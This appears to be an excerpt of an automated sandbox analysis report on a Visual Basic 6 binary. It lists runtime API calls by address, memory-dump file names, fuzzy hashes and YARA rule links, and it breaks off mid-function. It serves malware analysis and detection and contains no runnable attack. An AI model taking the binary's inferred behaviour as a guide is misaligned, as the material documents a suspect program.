Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004103BE
Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(?,00000000), ref: 004103CA
Part of subcall function 00410180: __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 004103DB
Part of subcall function 00410180: __vbaStrCat.MSVBVM60(?,0040614C,?,00000001,?,00000000), ref: 00410402
Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 00410410
Part of subcall function 00410180: __vbaStrCat.MSVBVM60(0040614C,00000000,?,00000000), ref: 0041041C
Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 0041042A
Part of subcall function 00410180: __vbaInStr.MSVBVM60(00000001,00000000,?,00000000), ref: 00410433
Part of subcall function 00410180: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410459
Part of subcall function 00410180: __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128,?,00000000), ref: 0041049A
Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000), ref: 004104B0
Part of subcall function 00410180: __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?,?,00000000), ref: 004104C9

__vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?,00000000), ref: 00408FCB
__vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408FE7
__vbaStrMove.MSVBVM60 ref: 00408FF2
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409000
__vbaStrMove.MSVBVM60 ref: 0040900B
__vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409017
__vbaStrMove.MSVBVM60 ref: 00409022

Part of subcall function 00410180: FindCloseChangeNotification.KERNELBASE(?), ref: 004104ED
Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(0041054B), ref: 00410517
Part of subcall function 00410180: __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041052F
Part of subcall function 00410180: __vbaFreeStr.MSVBVM60 ref: 00410538
Part of subcall function 00410180: __vbaFreeStr.MSVBVM60 ref: 00410544

__vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000), ref: 0040903C
__vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00409057
__vbaStrMove.MSVBVM60 ref: 00409062
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409070
__vbaStrMove.MSVBVM60 ref: 0040907B
__vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409087
__vbaStrMove.MSVBVM60 ref: 00409092
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090A0
__vbaStrMove.MSVBVM60 ref: 004090AB
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090B8
__vbaStrMove.MSVBVM60 ref: 004090C3
__vbaStrCat.MSVBVM60(0040614C,00000000), ref: 004090CF
__vbaStrMove.MSVBVM60 ref: 004090DA
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090E8
__vbaStrMove.MSVBVM60 ref: 004090F3
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409101
__vbaStrMove.MSVBVM60 ref: 0040910C
__vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409118
__vbaStrMove.MSVBVM60 ref: 00409123
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409130
__vbaStrMove.MSVBVM60 ref: 0040913B
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409149
__vbaStrMove.MSVBVM60 ref: 00409154
__vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409160
__vbaStrMove.MSVBVM60 ref: 0040916B
__vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004091A9
__vbaStrCmp.MSVBVM60(00000000,00000000), ref: 004091D2
#580.MSVBVM60(00000000,00000027,00000000,00000000,0041B088,00000000), ref: 00409245
__vbaStrCat.MSVBVM60( SE,00000000,00000000), ref: 0040925D
#600.MSVBVM60(00000008,00000000), ref: 00409273
__vbaFreeVar.MSVBVM60 ref: 00409282
__vbaSetSystemError.MSVBVM60 ref: 004092A4
__vbaStrCopy.MSVBVM60 ref: 004092B9
__vbaStrMove.MSVBVM60(?), ref: 004092CD
__vbaStrCopy.MSVBVM60 ref: 004092DA
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004092EA
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040930E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405A00,0000005C), ref: 00409354
__vbaErrorOverflow.MSVBVM60 ref: 0040ABAC
__vbaChkstk.MSVBVM60(?,004025E6), ref: 0040ABDE
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040AC25

Strings

D, xrefs: 004091B2

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Move$Free$Error$ListSystem$Ansi$Copy$Chkstk$#525#580#600#616BoundsBstrChangeCheckCloseConstruct2DestructFindGenerateHresultNotificationOverflowUnicode
String ID: D
API String ID: 4167556621-2746444292
Opcode ID: 11f9facc399d33ccd5957aa5b8bc6d7bb7eda86f6c6e8ffcf1e3eddd6603bfbf
Instruction ID: 28a137cb3eb25e758eafbfe2ee42426fba9f6ce594aea99c4a1f109bb6dd76d7
Opcode Fuzzy Hash: 11f9facc399d33ccd5957aa5b8bc6d7bb7eda86f6c6e8ffcf1e3eddd6603bfbf
Instruction Fuzzy Hash: 7CE1B876900104EFD705EBE0EE989DF7BB9EB4C301B10812AF617A7264DF745A45CBA8

Function 004125A0 Relevance: 54.2, APIs: 36, Instructions: 195COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,004087E7,00000000), ref: 004125BE
__vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004125EB
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004125FA
#648.MSVBVM60(0000000A), ref: 00412619
__vbaFreeVar.MSVBVM60 ref: 00412628
__vbaI2I4.MSVBVM60(?), ref: 0041263C
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041264A
__vbaI2I4.MSVBVM60 ref: 0041265A
#570.MSVBVM60(00000000), ref: 00412661
__vbaLenBstr.MSVBVM60(00404B24), ref: 0041266E
__vbaLenBstr.MSVBVM60(00404B24), ref: 004126A5
#525.MSVBVM60(00000000), ref: 004126AC
__vbaStrMove.MSVBVM60 ref: 004126B7
__vbaI2I4.MSVBVM60 ref: 004126C7
__vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004126D2
__vbaI2I4.MSVBVM60 ref: 004126E2
__vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004126EF

Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3

__vbaStrMove.MSVBVM60(?), ref: 0041270A
__vbaStrCopy.MSVBVM60 ref: 00412728
__vbaStrMove.MSVBVM60(00000003), ref: 00412739
#616.MSVBVM60(00000000), ref: 00412740
__vbaStrMove.MSVBVM60 ref: 0041274B

Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117

__vbaStrMove.MSVBVM60(?,00000000), ref: 00412760
__vbaStrCmp.MSVBVM60(00000000), ref: 00412767
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 0041278E

Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E

__vbaStrMove.MSVBVM60(?), ref: 004127B4
__vbaStrMove.MSVBVM60(00000004), ref: 004127D5
#618.MSVBVM60(00000000), ref: 004127DC
__vbaStrMove.MSVBVM60 ref: 004127E7
__vbaI4Str.MSVBVM60(00000000), ref: 004127EE
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00412805
__vbaI2I4.MSVBVM60 ref: 00412838
__vbaFileClose.MSVBVM60(00000000), ref: 0041283F
__vbaFreeStr.MSVBVM60(00412888), ref: 00412878
__vbaFreeStr.MSVBVM60 ref: 00412881
__vbaErrorOverflow.MSVBVM60 ref: 0041289E

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$FreeMove$#516#631BstrCopyFile$ErrorList$#525#537#570#616#618#648ChkstkCloseGet3OpenOverflowSeek
String ID:
API String ID: 1066637744-0
Opcode ID: 340591075b346b5ba6fee1fbb1c14d57b1d27844eec09d86ed4196eac17be608
Instruction ID: 32f108f087d7d4630656b8080de6af3654730a431ac790d0d60a92850006a6c2
Opcode Fuzzy Hash: 340591075b346b5ba6fee1fbb1c14d57b1d27844eec09d86ed4196eac17be608
Instruction Fuzzy Hash: 3A81B5B1D00248EBDB04DFE4DE58BDEBBB4BB48305F10852AE612B76A0DB745A45CB58

Function 0040FBA0 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 139fileCOMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,004025E6,?,?,00000000,?,00000000,004025E6), ref: 0040FBBE
__vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6,?), ref: 0040FBEE

Part of subcall function 0040F8F0: __vbaStrToAnsi.MSVBVM60(?,00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F92B
Part of subcall function 0040F8F0: __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F939
Part of subcall function 0040F8F0: __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F944
Part of subcall function 0040F8F0: __vbaFreeStr.MSVBVM60(?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F94D

#580.MSVBVM60(00000000,00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC1A
#529.MSVBVM60(00004008), ref: 0040FC38
#609.MSVBVM60(00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC65
__vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6,?), ref: 0040FC70
__vbaVarDup.MSVBVM60 ref: 0040FC8A
#709.MSVBVM60(00000000,004055FC,000000FF,00000000,?), ref: 0040FCBF
#616.MSVBVM60(00000000,00000000), ref: 0040FCCC
__vbaStrMove.MSVBVM60 ref: 0040FCD7
#650.MSVBVM60(00000008,?,00000001,00000001,00000000), ref: 0040FCEA
__vbaStrMove.MSVBVM60 ref: 0040FCF5
__vbaStrCat.MSVBVM60(00000000), ref: 0040FCFC
__vbaStrMove.MSVBVM60 ref: 0040FD07
#535.MSVBVM60(00000000), ref: 0040FD0E
__vbaStrR4.MSVBVM60 ref: 0040FD18
__vbaStrMove.MSVBVM60 ref: 0040FD23
__vbaStrCat.MSVBVM60(00000000), ref: 0040FD2A
__vbaStrMove.MSVBVM60 ref: 0040FD35
__vbaNameFile.MSVBVM60(00000000), ref: 0040FD3C
__vbaFreeStrList.MSVBVM60(00000006,?,00000000,?,?,?,00000000), ref: 0040FD5C
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,00000000,?,00000000,004025E6,?), ref: 0040FD6F

Strings

yymmdd, xrefs: 0040FC76

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Move$Free$ErrorList$#529#535#580#609#616#650#709AnsiChkstkFileNameSystemUnicode
String ID: yymmdd
API String ID: 2807397001-2871001947
Opcode ID: e917d64518279be88331d0eee65286a09dc515aaab7a2e939e415087cab1bec9
Instruction ID: f15f1b85a0f637e4cae317bac7f6929bfb3b2a163c4115d7559e6a64fae5d6e2
Opcode Fuzzy Hash: e917d64518279be88331d0eee65286a09dc515aaab7a2e939e415087cab1bec9
Instruction Fuzzy Hash: 6951E9B5900208EBDB04DFE4DD98BDEBBB8BF48305F108129F506BB6A0DB745A49CB54

Function 0040F8F0 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

__vbaStrToAnsi.MSVBVM60(?,00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F92B
__vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F939
__vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F944
__vbaFreeStr.MSVBVM60(?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F94D

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$AnsiErrorFreeSystemUnicode
String ID:
API String ID: 1195834276-0
Opcode ID: bba16db9fe18d1294021216763c91cb410f3f25e548062a572f5b041e07ffa40
Instruction ID: 20dc9a41ebc36c65f54ff828c917c87bbfccee6e827f5727337c9189070ed0dc
Opcode Fuzzy Hash: bba16db9fe18d1294021216763c91cb410f3f25e548062a572f5b041e07ffa40
Instruction Fuzzy Hash: 05015EB1900205AFCB149FA8C94AB6E7BB8EB44700F50453AF555F3290D73899458B99

Function 0040F9A0 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

__vbaStrToAnsi.MSVBVM60(?,00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9DB
__vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9E9
__vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9F4
__vbaFreeStr.MSVBVM60(?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9FD

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$AnsiErrorFreeSystemUnicode
String ID:
API String ID: 1195834276-0
Opcode ID: 65e89174baaba1573401519e836ee25ddfce7923bb9d535aed6c714f1c2090de
Instruction ID: 19c458602e53a293f3e6311b0924b7b74753bb6bdf76692d44a87d1e904a729f
Opcode Fuzzy Hash: 65e89174baaba1573401519e836ee25ddfce7923bb9d535aed6c714f1c2090de
Instruction Fuzzy Hash: 87019E71A00205AFCB049BB8CD4AA6F7BB8FB48740F50413AF515F32D0D73899058B99

Function 0040290C Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

#100.MSVBVM60(00403ADC), ref: 00402911

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: #100
String ID:
API String ID: 1341478452-0
Opcode ID: 888c60d2457cf6dbd883993a77a6020c9e73b0fd5a151ae3ce4b865bcf7f8659
Instruction ID: 67256ad5df038b3606e19c3fd4962ab61de0c6f9014364b0e1939c668627c31a
Opcode Fuzzy Hash: 888c60d2457cf6dbd883993a77a6020c9e73b0fd5a151ae3ce4b865bcf7f8659
Instruction Fuzzy Hash: 14F0139628E3C60EC303576409269487F705D4316030A42EBD1C5DF0E3D298494AC767

Non-executed Functions

Function 00412C10 Relevance: 684.7, APIs: 386, Strings: 4, Instructions: 2188COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(?,00000000), ref: 00412E3F
__vbaStrCopy.MSVBVM60(?,00000000), ref: 00412E47
__vbaOnError.MSVBVM60(00000001,?,00000000), ref: 00412E4B
__vbaRecUniToAnsi.MSVBVM60(00405CF4,?,?,00000160,00000101,?,00000000), ref: 00412E76
__vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,?,00000000), ref: 00412E89
__vbaSetSystemError.MSVBVM60(00000000,?,00000000), ref: 00412E95
__vbaRecAnsiToUni.MSVBVM60(00405CF4,?,?,?,00000000), ref: 00412EAE
__vbaRecUniToAnsi.MSVBVM60(00405CF4,?,?,00000160,00000100,?,00000000), ref: 00412EE7
__vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,?,00000000), ref: 00412EFA
__vbaSetSystemError.MSVBVM60(00000000,?,00000000), ref: 00412F06
__vbaRecAnsiToUni.MSVBVM60(00405CF4,?,?,?,00000000), ref: 00412F1F
__vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 00412F30
__vbaFreeStr.MSVBVM60(?,00000000), ref: 00412F3C
__vbaHresultCheckObj.MSVBVM60(00000000,6CF8D83C,004074A0,00000278,?,00000000), ref: 00412F62
__vbaI2I4.MSVBVM60(?,00000000), ref: 00412F71
__vbaHresultCheckObj.MSVBVM60(00000000,6CF8D83C,004074A0,0000011C,?,00000000), ref: 00412F91
__vbaHresultCheckObj.MSVBVM60(00000000,6CF8D83C,004074A0,00000084,?,00000000), ref: 00412FDC
__vbaHresultCheckObj.MSVBVM60(00000000,6CF8D83C,004074A0,0000008C,?,00000000), ref: 00413024
__vbaHresultCheckObj.MSVBVM60(00000000,6CF8D83C,004074A0,00000154,?,00000000), ref: 00413049
__vbaHresultCheckObj.MSVBVM60(00000000,6CF8D83C,004074A0,00000050,?,00000000), ref: 0041306D
__vbaHresultCheckObj.MSVBVM60(00000000,6CF8D83C,004074A0,000000E0,?,00000000), ref: 004130A3
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,?,00000000,00000000,00000003,?,00000000), ref: 004130C9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004074A0,00000264,?,00000000), ref: 004130FE
__vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 00413110
__vbaRedim.MSVBVM60(00000180,00000004,?,00000008,00000002,00000003,00000000,?,00000000,?,00000000), ref: 00413138
__vbaI2I4.MSVBVM60 ref: 0041314C
__vbaI2I4.MSVBVM60 ref: 0041317F
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004074A0,00000284), ref: 0041320C
__vbaI2I4.MSVBVM60(?,?), ref: 00413234
__vbaI2I4.MSVBVM60(?,?), ref: 00413252
__vbaI2I4.MSVBVM60(?,?), ref: 00413270
#537.MSVBVM60(00000000,?), ref: 004132B6
__vbaStrMove.MSVBVM60 ref: 004132C0
__vbaStrCat.MSVBVM60(00000000), ref: 004132C3
__vbaStrMove.MSVBVM60 ref: 004132CD
#537.MSVBVM60(00000000,00000000), ref: 004132D2
__vbaStrMove.MSVBVM60 ref: 004132DC
__vbaStrCat.MSVBVM60(00000000), ref: 004132DF
__vbaStrMove.MSVBVM60 ref: 004132E9
#537.MSVBVM60(00000000,00000000), ref: 004132EE
__vbaStrMove.MSVBVM60 ref: 004132F8
__vbaStrCat.MSVBVM60(00000000), ref: 004132FB
__vbaStrMove.MSVBVM60 ref: 00413305
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0041332C
#537.MSVBVM60(?,?), ref: 00413355
__vbaStrMove.MSVBVM60 ref: 0041335F
__vbaStrCat.MSVBVM60(00000000), ref: 00413362
__vbaStrMove.MSVBVM60 ref: 0041336C
#537.MSVBVM60(?,00000000), ref: 00413377
__vbaStrMove.MSVBVM60 ref: 00413381
__vbaStrCat.MSVBVM60(00000000), ref: 00413384
__vbaStrMove.MSVBVM60 ref: 0041338E
#537.MSVBVM60(?,00000000), ref: 00413399
__vbaStrMove.MSVBVM60 ref: 004133A3
__vbaStrCat.MSVBVM60(00000000), ref: 004133A6
__vbaStrMove.MSVBVM60 ref: 004133B0
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 004133D7
__vbaI2I4.MSVBVM60 ref: 00413434
__vbaGenerateBoundsError.MSVBVM60 ref: 00413487
__vbaGenerateBoundsError.MSVBVM60 ref: 0041349F
__vbaGenerateBoundsError.MSVBVM60 ref: 004134BF
__vbaStrCopy.MSVBVM60 ref: 004134D2
__vbaI2I4.MSVBVM60 ref: 00413516
__vbaI2I4.MSVBVM60 ref: 00413548
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004074A0,00000284), ref: 004135CC
__vbaGenerateBoundsError.MSVBVM60 ref: 00413610
_adj_fdiv_m64.MSVBVM60 ref: 00413645
__vbaR8IntI4.MSVBVM60 ref: 00413654
__vbaGenerateBoundsError.MSVBVM60 ref: 00413667
__vbaGenerateBoundsError.MSVBVM60 ref: 0041368D
__vbaStrCmp.MSVBVM60(004074B4,00000000), ref: 0041369E
__vbaGenerateBoundsError.MSVBVM60 ref: 004136D5
_adj_fdiv_m64.MSVBVM60 ref: 00413706
__vbaR8IntI4.MSVBVM60 ref: 00413715
__vbaGenerateBoundsError.MSVBVM60 ref: 00413728
__vbaGenerateBoundsError.MSVBVM60 ref: 00413748
__vbaStrCopy.MSVBVM60 ref: 00413757
__vbaGenerateBoundsError.MSVBVM60 ref: 00413786
_adj_fdiv_m64.MSVBVM60 ref: 004137B7
__vbaR8IntI4.MSVBVM60 ref: 004137C6
__vbaGenerateBoundsError.MSVBVM60 ref: 004137D9
__vbaGenerateBoundsError.MSVBVM60 ref: 004137F9
__vbaGenerateBoundsError.MSVBVM60 ref: 0041382A
_adj_fdiv_m64.MSVBVM60 ref: 0041385F
__vbaR8IntI4.MSVBVM60 ref: 0041386E
__vbaGenerateBoundsError.MSVBVM60 ref: 00413885
__vbaGenerateBoundsError.MSVBVM60 ref: 004138B8
__vbaGenerateBoundsError.MSVBVM60 ref: 00413900
_adj_fdiv_m64.MSVBVM60 ref: 00413935
__vbaR8IntI4.MSVBVM60 ref: 00413944
__vbaGenerateBoundsError.MSVBVM60 ref: 00413957
__vbaGenerateBoundsError.MSVBVM60 ref: 0041397D
__vbaStrCmp.MSVBVM60(004074B4,00000000), ref: 0041398E
__vbaGenerateBoundsError.MSVBVM60 ref: 004139C5
_adj_fdiv_m64.MSVBVM60 ref: 004139F6
__vbaR8IntI4.MSVBVM60 ref: 00413A05
__vbaGenerateBoundsError.MSVBVM60 ref: 00413A18
__vbaGenerateBoundsError.MSVBVM60 ref: 00413A38
__vbaStrCopy.MSVBVM60 ref: 00413A47
__vbaGenerateBoundsError.MSVBVM60 ref: 00413A76
_adj_fdiv_m64.MSVBVM60 ref: 00413AA7
__vbaR8IntI4.MSVBVM60 ref: 00413AB6
__vbaGenerateBoundsError.MSVBVM60 ref: 00413AC9
__vbaGenerateBoundsError.MSVBVM60 ref: 00413AE9
__vbaGenerateBoundsError.MSVBVM60 ref: 00413B1A
_adj_fdiv_m64.MSVBVM60 ref: 00413B4F
__vbaR8IntI4.MSVBVM60 ref: 00413B5E
__vbaGenerateBoundsError.MSVBVM60 ref: 00413B75
__vbaGenerateBoundsError.MSVBVM60 ref: 00413B93
__vbaStrCat.MSVBVM60(00406E00,00000000), ref: 00413BB0
__vbaStrMove.MSVBVM60 ref: 00413BBA
__vbaStrCopy.MSVBVM60 ref: 00413BC6
__vbaFreeStr.MSVBVM60 ref: 00413BD2
__vbaI2I4.MSVBVM60 ref: 00413C2A
__vbaGenerateBoundsError.MSVBVM60 ref: 00413C79
__vbaGenerateBoundsError.MSVBVM60 ref: 00413C91
__vbaGenerateBoundsError.MSVBVM60 ref: 00413CAD
__vbaStrCmp.MSVBVM60(004074B4,00000000), ref: 00413CC2
__vbaGenerateBoundsError.MSVBVM60 ref: 00413CF5
__vbaGenerateBoundsError.MSVBVM60 ref: 00413D0D
__vbaGenerateBoundsError.MSVBVM60 ref: 00413D29
#537.MSVBVM60(?,?), ref: 00413D49
__vbaStrMove.MSVBVM60(?,?), ref: 00413D57
__vbaStrCat.MSVBVM60(00000000,?,?), ref: 00413D5A
__vbaStrMove.MSVBVM60(?,?), ref: 00413D64
__vbaFreeStr.MSVBVM60(?,?), ref: 00413D6C
__vbaStrCat.MSVBVM60(?,?), ref: 00413DC0
__vbaStrMove.MSVBVM60 ref: 00413DCA
#537.MSVBVM60(00000000), ref: 00413DCE
_adj_fdiv_m64.MSVBVM60(00000008,?), ref: 00413E47
__vbaLenBstr.MSVBVM60(?,00000008,?), ref: 00413E72
__vbaFpI4.MSVBVM60(?,00000008,?), ref: 00413EA0
#606.MSVBVM60(00000000,?,00000008,?), ref: 00413EAD
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00413EB7
__vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00413EBA
__vbaStrMove.MSVBVM60(?,00000008,?), ref: 00413EC4
__vbaFreeStr.MSVBVM60(?,00000008,?), ref: 00413ECC
__vbaFreeVar.MSVBVM60(?,00000008,?), ref: 00413ED8
#537.MSVBVM60(00000000,?,00000008,?), ref: 00413EEA
#537.MSVBVM60(00000000,?,00000008,?), ref: 00413F02
#537.MSVBVM60(00000000,?,00000008,?), ref: 00413F1A
#537.MSVBVM60(00000000,?,00000008,?), ref: 00413F32
#537.MSVBVM60(00000000,?,00000008,?), ref: 00413F4A
#537.MSVBVM60(00000000,?,00000008,?), ref: 00413F62
#537.MSVBVM60(00000000,?,00000008,?), ref: 00413F7A
#537.MSVBVM60(00000000,?,00000008,?), ref: 00413F92
